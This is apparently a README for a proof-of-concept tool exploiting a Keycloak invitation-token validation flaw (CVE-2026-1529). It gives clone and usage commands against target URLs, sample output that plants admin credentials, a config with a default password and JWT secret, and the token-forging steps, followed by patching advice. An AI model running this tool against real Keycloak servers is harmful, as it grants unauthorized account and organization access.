# CVE-2026-1529 Keycloak Exploit Tool

**Keycloak: Unauthorized organization registration via improper invitation token validation**

---

## Disclaimer

**This tool is for educational and security testing purposes only.** Use only on systems you have explicit permission to test. Unauthorized access to computer systems is illegal and unethical. The authors of this tool are not responsible for any misuse or damage caused by this software.

**Created by:** f3ds cr3w est, 2002

---

## Overview

CVE-2026-1529 is a critical vulnerability in Keycloak that allows unauthorized organization registration through improper invitation token validation. This exploit tool demonstrates the vulnerability by manipulating JWT tokens to register users in unauthorized organizations.

### Technical Details

- **CVE ID:** CVE-2026-1529
- **Affected Software:** Keycloak (org.keycloak.services.resources.organizations)
- **CVSS Score:** 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
- **Attack Vector:** Network
- **Attack Complexity:** Low
- **Impact:** Unauthorized access to organization resources

### Vulnerability Description

The vulnerability exists in the JWT token validation process for organization invitations. Attackers can manipulate the `org_id` and `email` fields in the JWT payload, allowing them to register users in any organization without proper authorization.

---

## Installation

### Prerequisites

- Python 3.7 or higher
- pip package manager

### Setup

1. Clone or download the exploit tool:
```bash
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
```

2. Install required dependencies:
```bash
pip install -r requirements.txt
```

3. Make the exploit script executable:
```bash
chmod +x keycloak-exploit.py
```

---

## Usage

### Basic Usage

```bash
# Standard usage with target URL
python keycloak-exploit.py https://target-keycloak.com

# Show help
python keycloak-exploit.py -h

# Show version
python keycloak-exploit.py -v
```

### Advanced Usage

```bash
# Use custom invitation token
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Use custom organization ID
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Use custom configuration file
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Enable debug logging
python keycloak-exploit.py -d https://target-keycloak.com
```

### Command Line Options

| Option | Description | Required |
|--------|-------------|----------|
| `target` | Target Keycloak URL (IP or domain) | Yes |
| `-t, --token` | Custom invitation token to use | No |
| `-o, --org-id` | Custom organization ID | No |
| `-c, --config` | Path to configuration file | No |
| `-d, --debug` | Enable debug logging | No |
| `-v, --version` | Show version information | No |
| `-h, --help` | Show help message | No |

---

## Output

### Successful Exploit

When the exploit is successful, you'll see output like:

```
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: exploit@admin.com
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================
```

### Failed Exploit

If the exploit fails, you'll see:

```
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log
```

---

## Project Structure

```
CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports
```

---

## Configuration

### Default Configuration

The tool uses a default configuration file (`config/default_config.json`) with the following settings:

```json
{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "exploit@admin.com",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}
```

### Custom Configuration

You can create a custom configuration file and use it with the `-c` option:

```json
{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "custom@example.com",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}
```

---

## Technical Details

### Exploit Process

1. **Target Analysis**: Check if the target is a vulnerable Keycloak instance
2. **Token Generation**: Generate or use a custom invitation token
3. **Token Manipulation**: Manipulate the JWT payload to change organization ID
4. **User Registration**: Register a user using the manipulated token
5. **Login Testing**: Verify the created user can log in
6. **Report Generation**: Create a detailed exploit report

### JWT Manipulation

The tool exploits the improper JWT validation by:

1. Decoding the JWT token without signature verification
2. Modifying the `org_id` field to target a different organization
3. Modifying the `email` field if needed
4. Re-encoding the token with the manipulated payload

### Security Considerations

- The tool uses proper error handling and logging
- All network requests include appropriate headers
- Input validation is performed on all user inputs
- The tool respects the target's server response codes

---

## Troubleshooting

### Common Issues

1. **Connection Errors**
   - Check if the target URL is accessible
   - Verify the target is a Keycloak instance
   - Check network connectivity and firewall settings

2. **Token Validation Errors**
   - Ensure the token format is correct
   - Check if the token contains required fields (`org_id`, `email`, `invitation_type`)
   - Verify the token is not expired

3. **Registration Failures**
   - Check if the registration endpoint is accessible
   - Verify the manipulated token format
   - Check if the target has organization registration enabled

### Debug Mode

Enable debug logging for detailed troubleshooting:

```bash
python keycloak-exploit.py -d https://target-keycloak.com
```

### Log Files

- Main log: `logs/exploit.log`
- Reports: `output/reports/exploit_report_YYYYMMDD_HHMMSS.txt`

---

## Testing Methodology

### Vulnerability Assessment

The tool performs the following checks:

1. **Health Check**: Verifies the target is a Keycloak instance
2. **Version Detection**: Attempts to detect the Keycloak version
3. **Endpoint Testing**: Tests organization-related endpoints
4. **Token Validation**: Validates JWT token structure

### Exploit Validation

The exploit is considered successful if:

1. The target is vulnerable
2. A user can be registered using the manipulated token
3. The registered user can log in successfully
4. A valid login link is generated

---

## Security Best Practices

### For Organizations

1. **Apply Patches**: Update to the latest Keycloak version
2. **Token Validation**: Implement proper JWT signature verification
3. **Access Control**: Restrict organization registration to authorized users
4. **Monitoring**: Monitor for suspicious registration activities
5. **Network Security**: Implement proper firewall rules

### For Security Researchers

1. **Authorization**: Only test systems you have permission to test
2. **Responsible Disclosure**: Report vulnerabilities to vendors
3. **Documentation**: Keep detailed records of your testing
4. **Ethical Testing**: Follow responsible disclosure practices

---

## License

This tool is provided for educational and security testing purposes only. Use at your own risk.

**Created by:** f3ds cr3w est, 2002

**Contact:** For questions or feedback, please refer to the project repository.

---

## Changelog

### Version 1.0
- Initial release
- Basic exploit functionality
- JWT manipulation capabilities
- Report generation
- Command-line interface

---

## 🙏 Acknowledgments

- Keycloak development team
- Security researchers who discovered CVE-2026-1529
- The open-source security community

---

**Remember:** With great power comes great responsibility. Use this tool wisely and ethically.

*by f3ds cr3w est, 2002*